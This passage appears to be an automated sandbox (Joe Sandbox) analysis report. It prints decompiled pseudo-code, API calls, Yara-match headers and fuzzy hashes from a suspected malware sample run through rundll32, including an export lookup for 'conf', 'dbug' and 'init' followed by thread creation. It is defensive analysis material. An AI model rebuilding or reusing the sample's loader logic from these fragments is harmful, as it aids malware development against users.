                                                            					if( *((intOrPtr*)(__ecx + 0x1c)) == 2) {
                                                            						_t57 =  *(__ecx + 0x2c);
                                                            						if( *(__ecx + 0x2c) != 0) {
                                                            							_t46 = E0463D260(_t57, "dbug");
                                                            							if(_t46 != 0) {
                                                            								 *_t46(1);
                                                            							}
                                                            						}
                                                            					}
                                                            					L5:
                                                            					return 1;
                                                            				}
                                                            			}

                                                            Addresses: 0x0463e420, 0x0463e421, 0x0463e428, 0x0463e451, 0x0463e455, 0x00000000, 0x0463e457, 0x0463e457, 0x0463e45b, 0x0463e45f, 0x0463e467, 0x0463e46e, 0x0463e474, 0x0463e474, 0x0463e477, 0x0463e47b, 0x0463e548, 0x0463e548, 0x0463e54b, 0x0463e481, 0x0463e481, 0x0463e483, 0x0463e487, 0x00000000, 0x0463e48d, 0x0463e48d, 0x0463e490, 0x0463e494, 0x0463e498, 0x0463e4a8, 0x0463e4af, 0x0463e4af, 0x0463e4b4, 0x0463e4b7, 0x0463e4bb, 0x00000000, 0x0463e4c1, 0x0463e4cb, 0x0463e4cd, 0x0463e4cf, 0x0463e4df, 0x0463e4df, 0x0463e4ec, 0x0463e4ec, 0x0463e4fb, 0x0463e4fd, 0x0463e4ff, 0x0463e507, 0x0463e507, 0x0463e509, 0x0463e50d, 0x0463e50f, 0x0463e512, 0x0463e514, 0x0463e51b, 0x0463e520, 0x0463e522, 0x0463e526, 0x0463e526, 0x0463e522, 0x0463e514, 0x0463e53c, 0x0463e546, 0x0463e546, 0x0463e4bb, 0x0463e487, 0x0463e47b, 0x0463e42a, 0x0463e42e, 0x0463e430, 0x0463e435, 0x0463e43c, 0x0463e443, 0x0463e447, 0x0463e447, 0x0463e443, 0x0463e435, 0x0463e449, 0x0463e450, 0x0463e450

                                                            APIs
                                                            • CreateThread.KERNEL32(00000000,00000000,0463E300,?,00000000,00000000), ref: 0463E536
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID: conf$dbug$init
                                                            • API String ID: 2422867632-3701578037
                                                            • Opcode ID: 9e1495f571618f62bfcf744cdbe060fcab70ff79b4ce25fc722a9497dbbb728c
                                                            • Instruction ID: b3d3f9b0d3516643a66f28ac5180dafd3bf53e3c196861e2606c44437bf152af
                                                            • Opcode Fuzzy Hash: 9e1495f571618f62bfcf744cdbe060fcab70ff79b4ce25fc722a9497dbbb728c
                                                            • Instruction Fuzzy Hash: 463181317007409FF730AF65D908B6A72E1AF98716F04496DE1468B781FBB2F845CB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 34%
                                                            			E046392E0(void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				signed int _v9;
                                                            				struct _SECURITY_ATTRIBUTES* _v20;
                                                            				struct _SECURITY_ATTRIBUTES* _v21;
                                                            				struct _SECURITY_ATTRIBUTES* _v24;
                                                            				struct _SECURITY_ATTRIBUTES* _v25;
                                                            				struct _SECURITY_ATTRIBUTES* _v28;
                                                            				struct _SECURITY_ATTRIBUTES* _v29;
                                                            				struct _SECURITY_ATTRIBUTES* _v44;
                                                            				char _v48;
                                                            				struct _SECURITY_ATTRIBUTES* _v52;
                                                            				struct _SECURITY_ATTRIBUTES* _v56;
                                                            				intOrPtr _v60;
                                                            				intOrPtr _v61;
                                                            				struct _SECURITY_ATTRIBUTES* _v64;
                                                            				intOrPtr _v68;
                                                            				intOrPtr _v69;
                                                            				struct _SECURITY_ATTRIBUTES* _v72;
                                                            				intOrPtr _v73;
                                                            				struct _SECURITY_ATTRIBUTES* _v76;
                                                            				intOrPtr _v81;
                                                            				intOrPtr* _v92;
                                                            				char _v108;
                                                            				char _v109;
                                                            				void* _v112;
                                                            				void* _v113;
                                                            				char* _v116;
                                                            				char _v120;
                                                            				intOrPtr _v121;
                                                            				char _v124;
                                                            				signed int _t44;
                                                            				void* _t52;
                                                            				void** _t69;
                                                            				intOrPtr* _t71;
                                                            				intOrPtr _t72;
                                                            				signed int _t81;
                                                            				signed int _t83;
                                                            				signed int _t84;
                                                            
                                                            				_t83 = (_t81 & 0xfffffff8) - 0x7c;
                                                            				_t44 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t44 ^ _t83;
                                                            				E04637980( &_v108);
                                                            				_v68 = 0x467e048;
                                                            				_v64 = 0;
                                                            				_v60 = 0x467e024;
                                                            				_v56 = 0;
                                                            				_v20 = 0;
                                                            				_v28 = 0;
                                                            				_v24 = 0;
                                                            				_v44 = 0;
                                                            				_v76 = 0;
                                                            				_v72 = 0;
                                                            				_v52 = 0;
                                                            				_v48 = 0x43;
                                                            				E04638AE0( &_v108,  *0x46878d4 & 0x0000ffff);
                                                            				_t69 =  &_v112;
                                                            				_t84 = _t83 - 0xc;
                                                            				_push( *0x4684760 & 0x0000ffff);
                                                            				_push(0x46878d8);
                                                            				if(L04638BB0(_t69) != 0) {
                                                            					_v120 = 0x467e8b0;
                                                            					_v116 =  &_v108;
                                                            					_v52 =  &_v120;
                                                            					_t52 = CreateEventW(0, 1, 0, 0);
                                                            					_push(_t69);
                                                            					_push(0x3f);
                                                            					_v112 = _t52;
                                                            					_push(1);
                                                            					_push( &_v124);
                                                            					_v120 = 0x467ec8c;
                                                            					_v124 = 0x4a;
                                                            					E04631C60(_v116);
                                                            					_t71 = _v92;
                                                            					if(_t71 != 0) {
                                                            						 *((intOrPtr*)( *_t71 + 0x14))(0xffffffff);
                                                            					}
                                                            					_t72 = _v73;
                                                            					if(_t72 != 0) {
                                                            						 *((intOrPtr*)( *((intOrPtr*)(_t72 + 4)) + 0x14))(0xffffffff);
                                                            					}
                                                            					_v121 = 0x467e8b0;
                                                            					CloseHandle(_v113);
                                                            					_v121 = 0x467e8c0;
                                                            				}
                                                            				E04638C90( &_v109);
                                                            				_t57 = _v29;
                                                            				if(_v29 != 0) {
                                                            					L04655B0F(_t57);
                                                            					_t84 = _t84 + 4;
                                                            				}
                                                            				_t58 = _v81;
                                                            				_v21 = 0;
                                                            				_v29 = 0;
                                                            				_v25 = 0;
                                                            				_v61 = 0x467df88;
                                                            				_v69 = 0x467e008;
                                                            				if(_v81 != 0) {
                                                            					L04655B0F(_t58);
                                                            					_t84 = _t84 + 4;
                                                            				}
                                                            				return E04655AFE(_v9 ^ _t84);
                                                            			}

                                                            APIs
                                                              • Part of subcall function 04637980: LoadLibraryA.KERNEL32(ntdll.dll,00000000,?,00000000,0464B836), ref: 046379B0
                                                              • Part of subcall function 04637980: GetProcAddress.KERNEL32(00000000,RtlGetCompressionWorkSpaceSize), ref: 046379C2
                                                              • Part of subcall function 04637980: GetProcAddress.KERNEL32(00000000,RtlCompressBuffer), ref: 046379D5
                                                              • Part of subcall function 04637980: GetProcAddress.KERNEL32(00000000,RtlDecompressBuffer), ref: 046379E8
                                                            • CreateEventW.KERNEL32(00000000,00000001), ref: 046393B1
                                                            • CloseHandle.KERNEL32(0467E8B0,00000000,00000001,0000003F), ref: 0463940B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$CloseCreateEventHandleLibraryLoad
                                                            • String ID: C$J
                                                            • API String ID: 1850149996-3934036899
                                                            • Opcode ID: f9dd382b47fb2d2b4c1a59a4d1b60cccd6a2ec14e46c4259e475a382c89f4488
                                                            • Instruction ID: 3882cebe4cdebdc203a61ea26b39eb771e9d5010af90aab6c1927ce0be656a7b
                                                            • Opcode Fuzzy Hash: f9dd382b47fb2d2b4c1a59a4d1b60cccd6a2ec14e46c4259e475a382c89f4488
                                                            • Instruction Fuzzy Hash: CC4128B15083819BE310DF64C458B1BBBE4AF91709F100A1DF5A19A2A0EBB5E508CF97
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 75%
                                                            			E0466B2BC(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
                                                            				signed int _v8;
                                                            				signed int _v12;
                                                            				signed int _v16;
                                                            				unsigned int _v20;
                                                            				signed int _v28;
                                                            				signed int _v32;
                                                            				signed int _v36;
                                                            				char _v40;
                                                            				intOrPtr _v48;
                                                            				char _v52;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* _t86;
                                                            				signed int _t92;
                                                            				signed int _t93;
                                                            				signed int _t94;
                                                            				signed int _t100;
                                                            				void* _t101;
                                                            				void* _t102;
                                                            				void* _t104;
                                                            				void* _t107;
                                                            				void* _t109;
                                                            				void* _t111;
                                                            				void* _t115;
                                                            				char* _t116;
                                                            				void* _t119;
                                                            				signed int _t121;
                                                            				signed int _t128;
                                                            				signed int* _t129;
                                                            				signed int _t136;
                                                            				signed int _t137;
                                                            				char _t138;
                                                            				signed int _t139;
                                                            				signed int _t142;
                                                            				signed int _t146;
                                                            				signed int _t151;
                                                            				char _t156;
                                                            				char _t157;
                                                            				void* _t161;
                                                            				unsigned int _t162;
                                                            				signed int _t164;
                                                            				signed int _t166;
                                                            				signed int _t170;
                                                            				void* _t171;
                                                            				signed int* _t172;
                                                            				signed int _t174;
                                                            				signed int _t181;
                                                            				signed int _t182;
                                                            				signed int _t183;
                                                            				signed int _t184;
                                                            				signed int _t185;
                                                            				signed int _t186;
                                                            				signed int _t187;
                                                            
                                                            				_t171 = __edx;
                                                            				_t181 = _a24;
                                                            				if(_t181 < 0) {
                                                            					_t181 = 0;
                                                            				}
                                                            				_t184 = _a8;
                                                            				 *_t184 = 0;
                                                            				E0465EF84(0,  &_v52, _t171, _a36);
                                                            				_t5 = _t181 + 0xb; // 0xb
                                                            				if(_a12 > _t5) {
                                                            					_t172 = _a4;
                                                            					_t142 = _t172[1];
                                                            					_v36 =  *_t172;
                                                            					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
                                                            					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
                                                            						L11:
                                                            						__eflags = _t142 & 0x80000000;
                                                            						if((_t142 & 0x80000000) != 0) {
                                                            							 *_t184 = 0x2d;
                                                            							_t184 = _t184 + 1;
                                                            							__eflags = _t184;
                                                            						}
                                                            						__eflags = _a28;
                                                            						_v16 = 0x3ff;
                                                            						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
                                                            						__eflags = _t172[1] & 0x7ff00000;
                                                            						_v32 = _t136;
                                                            						_t86 = 0x30;
                                                            						if((_t172[1] & 0x7ff00000) != 0) {
                                                            							 *_t184 = 0x31;
                                                            							_t185 = _t184 + 1;
                                                            							__eflags = _t185;
                                                            						} else {
                                                            							 *_t184 = _t86;
                                                            							_t185 = _t184 + 1;
                                                            							_t164 =  *_t172 | _t172[1] & 0x000fffff;
                                                            							__eflags = _t164;
                                                            							if(_t164 != 0) {
                                                            								_v16 = 0x3fe;
                                                            							} else {
                                                            								_v16 = _v16 & _t164;
                                                            							}
                                                            						}
                                                            						_t146 = _t185;
                                                            						_t186 = _t185 + 1;
                                                            						_v28 = _t146;
                                                            						__eflags = _t181;
                                                            						if(_t181 != 0) {
                                                            							_t30 = _v48 + 0x88; // 0xffce8305
                                                            							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
                                                            						} else {
                                                            							 *_t146 = 0;
                                                            						}
                                                            						_t92 = _t172[1] & 0x000fffff;
                                                            						__eflags = _t92;
                                                            						_v20 = _t92;
                                                            						if(_t92 > 0) {
                                                            							L23:
                                                            							_t33 =  &_v8;
                                                            							 *_t33 = _v8 & 0x00000000;
                                                            							__eflags =  *_t33;
                                                            							_t147 = 0xf0000;
                                                            							_t93 = 0x30;
                                                            							_v12 = _t93;
                                                            							_v20 = 0xf0000;
                                                            							do {
                                                            								__eflags = _t181;
                                                            								if(_t181 <= 0) {
                                                            									break;
                                                            								}
                                                            								_t119 = E04671A30( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                                                            								_t161 = 0x30;
                                                            								_t121 = _t119 + _t161 & 0x0000ffff;
                                                            								__eflags = _t121 - 0x39;
                                                            								if(_t121 > 0x39) {
                                                            									_t121 = _t121 + _t136;
                                                            									__eflags = _t121;
                                                            								}
                                                            								_t162 = _v20;
                                                            								_t172 = _a4;
                                                            								 *_t186 = _t121;
                                                            								_t186 = _t186 + 1;
                                                            								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
                                                            								_t147 = _t162 >> 4;
                                                            								_t93 = _v12 - 4;
                                                            								_t181 = _t181 - 1;
                                                            								_v20 = _t162 >> 4;
                                                            								_v12 = _t93;
                                                            								__eflags = _t93;
                                                            							} while (_t93 >= 0);
                                                            							__eflags = _t93;
                                                            							if(_t93 < 0) {
                                                            								goto L39;
                                                            							}
                                                            							_t115 = E04671A30( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                                                            							__eflags = _t115 - 8;
                                                            							if(_t115 <= 8) {
                                                            								goto L39;
                                                            							}
                                                            							_t54 = _t186 - 1; // 0x2
                                                            							_t116 = _t54;
                                                            							_t138 = 0x30;
                                                            							while(1) {
                                                            								_t156 =  *_t116;
                                                            								__eflags = _t156 - 0x66;
                                                            								if(_t156 == 0x66) {
                                                            									goto L33;
                                                            								}
                                                            								__eflags = _t156 - 0x46;
                                                            								if(_t156 != 0x46) {
                                                            									_t139 = _v32;
                                                            									__eflags = _t116 - _v28;
                                                            									if(_t116 == _v28) {
                                                            										_t57 = _t116 - 1;
                                                            										 *_t57 =  *(_t116 - 1) + 1;
                                                            										__eflags =  *_t57;
                                                            									} else {
                                                            										_t157 =  *_t116;
                                                            										__eflags = _t157 - 0x39;
                                                            										if(_t157 != 0x39) {
                                                            											 *_t116 = _t157 + 1;
                                                            										} else {
                                                            											 *_t116 = _t139 + 0x3a;
                                                            										}
                                                            									}
                                                            									goto L39;
                                                            								}
                                                            								L33:
                                                            								 *_t116 = _t138;
                                                            								_t116 = _t116 - 1;
                                                            							}
                                                            						} else {
                                                            							__eflags =  *_t172;
                                                            							if( *_t172 <= 0) {
                                                            								L39:
                                                            								__eflags = _t181;
                                                            								if(_t181 > 0) {
                                                            									_push(_t181);
                                                            									_t111 = 0x30;
                                                            									_push(_t111);
                                                            									_push(_t186);
                                                            									E0465DEA0(_t181);
                                                            									_t186 = _t186 + _t181;
                                                            									__eflags = _t186;
                                                            								}
                                                            								_t94 = _v28;
                                                            								__eflags =  *_t94;
                                                            								if( *_t94 == 0) {
                                                            									_t186 = _t94;
                                                            								}
                                                            								__eflags = _a28;
                                                            								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                                                            								_t174 = _a4[1];
                                                            								_t100 = E04671A30( *_a4, 0x34, _t174);
                                                            								_t137 = 0;
                                                            								_t151 = (_t100 & 0x000007ff) - _v16;
                                                            								__eflags = _t151;
                                                            								asm("sbb ebx, ebx");
                                                            								if(__eflags < 0) {
                                                            									L47:
                                                            									 *(_t186 + 1) = 0x2d;
                                                            									_t187 = _t186 + 2;
                                                            									__eflags = _t187;
                                                            									_t151 =  ~_t151;
                                                            									asm("adc ebx, 0x0");
                                                            									_t137 =  ~_t137;
                                                            									goto L48;
                                                            								} else {
                                                            									if(__eflags > 0) {
                                                            										L46:
                                                            										 *(_t186 + 1) = 0x2b;
                                                            										_t187 = _t186 + 2;
                                                            										L48:
                                                            										_t182 = _t187;
                                                            										_t101 = 0x30;
                                                            										 *_t187 = _t101;
                                                            										__eflags = _t137;
                                                            										if(__eflags < 0) {
                                                            											L56:
                                                            											__eflags = _t187 - _t182;
                                                            											if(_t187 != _t182) {
                                                            												L60:
                                                            												_push(0);
                                                            												_push(0xa);
                                                            												_push(_t137);
                                                            												_push(_t151);
                                                            												_t102 = E046718F0();
                                                            												_v32 = _t174;
                                                            												 *_t187 = _t102 + 0x30;
                                                            												_t187 = _t187 + 1;
                                                            												__eflags = _t187;
                                                            												L61:
                                                            												_t104 = 0x30;
                                                            												_t183 = 0;
                                                            												__eflags = 0;
                                                            												 *_t187 = _t151 + _t104;
                                                            												 *(_t187 + 1) = 0;
                                                            												goto L62;
                                                            											}
                                                            											__eflags = _t137;
                                                            											if(__eflags < 0) {
                                                            												goto L61;
                                                            											}
                                                            											if(__eflags > 0) {
                                                            												goto L60;
                                                            											}
                                                            											__eflags = _t151 - 0xa;
                                                            											if(_t151 < 0xa) {
                                                            												goto L61;
                                                            											}
                                                            											goto L60;
                                                            										}
                                                            										if(__eflags > 0) {
                                                            											L51:
                                                            											_push(0);
                                                            											_push(0x3e8);
                                                            											_push(_t137);
                                                            											_push(_t151);
                                                            											_t107 = E046718F0();
                                                            											_v32 = _t174;
                                                            											 *_t187 = _t107 + 0x30;
                                                            											_t187 = _t187 + 1;
                                                            											__eflags = _t187 - _t182;
                                                            											if(_t187 != _t182) {
                                                            												L55:
                                                            												_push(0);
                                                            												_push(0x64);
                                                            												_push(_t137);
                                                            												_push(_t151);
                                                            												_t109 = E046718F0();
                                                            												_v32 = _t174;
                                                            												 *_t187 = _t109 + 0x30;
                                                            												_t187 = _t187 + 1;
                                                            												__eflags = _t187;
                                                            												goto L56;
                                                            											}
                                                            											L52:
                                                            											__eflags = _t137;
                                                            											if(__eflags < 0) {
                                                            												goto L56;
                                                            											}
                                                            											if(__eflags > 0) {
                                                            												goto L55;
                                                            											}
                                                            											__eflags = _t151 - 0x64;
                                                            											if(_t151 < 0x64) {
                                                            												goto L56;
                                                            											}
                                                            											goto L55;
                                                            										}
                                                            										__eflags = _t151 - 0x3e8;
                                                            										if(_t151 < 0x3e8) {
                                                            											goto L52;
                                                            										}
                                                            										goto L51;
                                                            									}
                                                            									__eflags = _t151;
                                                            									if(_t151 < 0) {
                                                            										goto L47;
                                                            									}
                                                            									goto L46;
                                                            								}
                                                            							}
                                                            							goto L23;
                                                            						}
                                                            					}
                                                            					__eflags = 0;
                                                            					if(0 != 0) {
                                                            						goto L11;
                                                            					} else {
                                                            						_t183 = E0466B5BF(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
                                                            						__eflags = _t183;
                                                            						if(_t183 == 0) {
                                                            							_t128 = E0465DA60(_t184, 0x65);
                                                            							_pop(_t166);
                                                            							__eflags = _t128;
                                                            							if(_t128 != 0) {
                                                            								__eflags = _a28;
                                                            								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                                                            								__eflags = _t170;
                                                            								 *_t128 = _t170;
                                                            								 *((char*)(_t128 + 3)) = 0;
                                                            							}
                                                            							_t183 = 0;
                                                            						} else {
                                                            							 *_t184 = 0;
                                                            						}
                                                            						goto L62;
                                                            					}
                                                            				} else {
                                                            					_t129 = E04661772();
                                                            					_t183 = 0x22;
                                                            					 *_t129 = _t183;
                                                            					E0465EEE6();
                                                            					L62:
                                                            					if(_v40 != 0) {
                                                            						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
                                                            					}
                                                            					return _t183;
                                                            				}
                                                            			}

                                                            0x0466b2bc
                                                            0x0466b2c7
                                                            0x0466b2ce
                                                            0x0466b2d0
                                                            0x0466b2d0
                                                            0x0466b2d2
                                                            0x0466b2db
                                                            0x0466b2dd
                                                            0x0466b2e2
                                                            0x0466b2e8
                                                            0x0466b2fe
                                                            0x0466b303
                                                            0x0466b306
                                                            0x0466b313
                                                            0x0466b318
                                                            0x0466b36c
                                                            0x0466b374
                                                            0x0466b376
                                                            0x0466b378
                                                            0x0466b37b
                                                            0x0466b37b
                                                            0x0466b37b
                                                            0x0466b381
                                                            0x0466b389
                                                            0x0466b39c
                                                            0x0466b39f
                                                            0x0466b3a1
                                                            0x0466b3a4
                                                            0x0466b3a5
                                                            0x0466b3c6
                                                            0x0466b3c9
                                                            0x0466b3c9
                                                            0x0466b3a7
                                                            0x0466b3a7
                                                            0x0466b3a9
                                                            0x0466b3b4
                                                            0x0466b3b4
                                                            0x0466b3b6
                                                            0x0466b3bd
                                                            0x0466b3b8
                                                            0x0466b3b8
                                                            0x0466b3b8
                                                            0x0466b3b6
                                                            0x0466b3ca
                                                            0x0466b3cc
                                                            0x0466b3cd
                                                            0x0466b3d0
                                                            0x0466b3d2
                                                            0x0466b3dc
                                                            0x0466b3e6
                                                            0x0466b3d4
                                                            0x0466b3d4
                                                            0x0466b3d4
                                                            0x0466b3eb
                                                            0x0466b3eb
                                                            0x0466b3f0
                                                            0x0466b3f3
                                                            0x0466b3fe
                                                            0x0466b3fe
                                                            0x0466b3fe
                                                            0x0466b3fe
                                                            0x0466b402
                                                            0x0466b409
                                                            0x0466b40a
                                                            0x0466b40d
                                                            0x0466b410
                                                            0x0466b410
                                                            0x0466b412
                                                            0x00000000
                                                            0x00000000
                                                            0x0466b42a
                                                            0x0466b431
                                                            0x0466b435
                                                            0x0466b438
                                                            0x0466b43b
                                                            0x0466b43d
                                                            0x0466b43d
                                                            0x0466b43d
                                                            0x0466b43f
                                                            0x0466b442
                                                            0x0466b445
                                                            0x0466b447
                                                            0x0466b44f
                                                            0x0466b455
                                                            0x0466b458
                                                            0x0466b45b
                                                            0x0466b45c
                                                            0x0466b45f
                                                            0x0466b462
                                                            0x0466b462
                                                            0x0466b467
                                                            0x0466b46a
                                                            0x00000000
                                                            0x00000000
                                                            0x0466b482
                                                            0x0466b487
                                                            0x0466b48b
                                                            0x00000000
                                                            0x00000000
                                                            0x0466b48f
                                                            0x0466b48f
                                                            0x0466b492
                                                            0x0466b493
                                                            0x0466b493
                                                            0x0466b495
                                                            0x0466b498
                                                            0x00000000
                                                            0x00000000
                                                            0x0466b49a
                                                            0x0466b49d
                                                            0x0466b4a4
                                                            0x0466b4a7
                                                            0x0466b4aa
                                                            0x0466b4c0
                                                            0x0466b4c0
                                                            0x0466b4c0
                                                            0x0466b4ac
                                                            0x0466b4ac
                                                            0x0466b4ae
                                                            0x0466b4b1
                                                            0x0466b4bc
                                                            0x0466b4b3
                                                            0x0466b4b6
                                                            0x0466b4b6
                                                            0x0466b4b1
                                                            0x00000000
                                                            0x0466b4aa
                                                            0x0466b49f
                                                            0x0466b49f
                                                            0x0466b4a1
                                                            0x0466b4a1
                                                            0x0466b3f5
                                                            0x0466b3f5
                                                            0x0466b3f8
                                                            0x0466b4c3
                                                            0x0466b4c3
                                                            0x0466b4c5
                                                            0x0466b4c7
                                                            0x0466b4ca
                                                            0x0466b4cb
                                                            0x0466b4cc
                                                            0x0466b4cd
                                                            0x0466b4d5
                                                            0x0466b4d5
                                                            0x0466b4d5
                                                            0x0466b4d7
                                                            0x0466b4da
                                                            0x0466b4dd
                                                            0x0466b4df
                                                            0x0466b4df
                                                            0x0466b4e1
                                                            0x0466b4f3
                                                            0x0466b4f7
                                                            0x0466b4fa
                                                            0x0466b501
                                                            0x0466b509
                                                            0x0466b509
                                                            0x0466b50c
                                                            0x0466b50e
                                                            0x0466b51f
                                                            0x0466b51f
                                                            0x0466b523
                                                            0x0466b523
                                                            0x0466b526
                                                            0x0466b528
                                                            0x0466b52b
                                                            0x00000000
                                                            0x0466b510
                                                            0x0466b510
                                                            0x0466b516
                                                            0x0466b516
                                                            0x0466b51a
                                                            0x0466b52d
                                                            0x0466b52d
                                                            0x0466b531
                                                            0x0466b532
                                                            0x0466b534
                                                            0x0466b536
                                                            0x0466b577
                                                            0x0466b577
                                                            0x0466b579
                                                            0x0466b586
                                                            0x0466b586
                                                            0x0466b588
                                                            0x0466b58a
                                                            0x0466b58b
                                                            0x0466b58c
                                                            0x0466b593
                                                            0x0466b596
                                                            0x0466b598
                                                            0x0466b598
                                                            0x0466b599
                                                            0x0466b59b
                                                            0x0466b59e
                                                            0x0466b59e
                                                            0x0466b5a0
                                                            0x0466b5a2
                                                            0x00000000
                                                            0x0466b5a2
                                                            0x0466b57b
                                                            0x0466b57d
                                                            0x00000000
                                                            0x00000000
                                                            0x0466b57f
                                                            0x00000000
                                                            0x00000000
                                                            0x0466b581
                                                            0x0466b584
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0466b584
                                                            0x0466b53d
                                                            0x0466b543
                                                            0x0466b543
                                                            0x0466b545
                                                            0x0466b546
                                                            0x0466b547
                                                            0x0466b548
                                                            0x0466b54f
                                                            0x0466b552
                                                            0x0466b554
                                                            0x0466b555
                                                            0x0466b557
                                                            0x0466b564
                                                            0x0466b564
                                                            0x0466b566
                                                            0x0466b568
                                                            0x0466b569
                                                            0x0466b56a
                                                            0x0466b571
                                                            0x0466b574
                                                            0x0466b576
                                                            0x0466b576
                                                            0x00000000
                                                            0x0466b576
                                                            0x0466b559
                                                            0x0466b559
                                                            0x0466b55b
                                                            0x00000000
                                                            0x00000000
                                                            0x0466b55d
                                                            0x00000000
                                                            0x00000000
                                                            0x0466b55f
                                                            0x0466b562
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0466b562
                                                            0x0466b53f
                                                            0x0466b541
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0466b541
                                                            0x0466b512
                                                            0x0466b514
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0466b514
                                                            0x0466b50e
                                                            0x00000000
                                                            0x0466b3f8
                                                            0x0466b3f3
                                                            0x0466b31a
                                                            0x0466b31c
                                                            0x00000000
                                                            0x0466b31e
                                                            0x0466b334
                                                            0x0466b339
                                                            0x0466b33b
                                                            0x0466b347
                                                            0x0466b34d
                                                            0x0466b34e
                                                            0x0466b350
                                                            0x0466b352
                                                            0x0466b35d
                                                            0x0466b35d
                                                            0x0466b360
                                                            0x0466b362
                                                            0x0466b362
                                                            0x0466b365
                                                            0x0466b33d
                                                            0x0466b33d
                                                            0x0466b33d
                                                            0x00000000
                                                            0x0466b33b
                                                            0x0466b2ea
                                                            0x0466b2ea
                                                            0x0466b2f1
                                                            0x0466b2f2
                                                            0x0466b2f4
                                                            0x0466b5a6
                                                            0x0466b5aa
                                                            0x0466b5af
                                                            0x0466b5af
                                                            0x0466b5be
                                                            0x0466b5be

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: __alldvrm$_strrchr
                                                            • String ID:
                                                            • API String ID: 1036877536-0
                                                            • Opcode ID: 56d7df094b96d399631f2e70f396444e24e0827d77f7372ca130cc79345a1ebe
                                                            • Instruction ID: a1e33af52e576496e40abe470cdb8630258f4887fd5ba6924e86da27d75f2c77
                                                            • Opcode Fuzzy Hash: 56d7df094b96d399631f2e70f396444e24e0827d77f7372ca130cc79345a1ebe
                                                            • Instruction Fuzzy Hash: AEA14671A003A6DFEB21CF28C8907AEBBA6EF65750F18416DD996DB381E234B941C750
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 81%
                                                            			E0466C27A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                                            				signed int _v8;
                                                            				int _v12;
                                                            				char _v16;
                                                            				intOrPtr _v24;
                                                            				char _v28;
                                                            				void* _v40;
                                                            				signed int _t34;
                                                            				signed int _t40;
                                                            				int _t46;
                                                            				int _t53;
                                                            				void* _t55;
                                                            				int _t57;
                                                            				signed int _t63;
                                                            				int _t67;
                                                            				short* _t69;
                                                            				signed int _t70;
                                                            				short* _t71;
                                                            
                                                            				_t34 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t34 ^ _t70;
                                                            				E0465EF84(__ebx,  &_v28, __edx, _a4);
                                                            				_t57 = _a24;
                                                            				if(_t57 == 0) {
                                                            					_t53 =  *(_v24 + 8);
                                                            					_t57 = _t53;
                                                            					_a24 = _t53;
                                                            				}
                                                            				_t67 = 0;
                                                            				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                            				_v12 = _t40;
                                                            				if(_t40 == 0) {
                                                            					L15:
                                                            					if(_v16 != 0) {
                                                            						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                                            					}
                                                            					return E04655AFE(_v8 ^ _t70);
                                                            				}
                                                            				_t55 = _t40 + _t40;
                                                            				_t17 = _t55 + 8; // 0x9
                                                            				asm("sbb eax, eax");
                                                            				if((_t17 & _t40) == 0) {
                                                            					_t69 = 0;
                                                            					L11:
                                                            					if(_t69 != 0) {
                                                            						E0465DEA0(_t67, _t69, _t67, _t55);
                                                            						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
                                                            						if(_t46 != 0) {
                                                            							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
                                                            						}
                                                            					}
                                                            					L14:
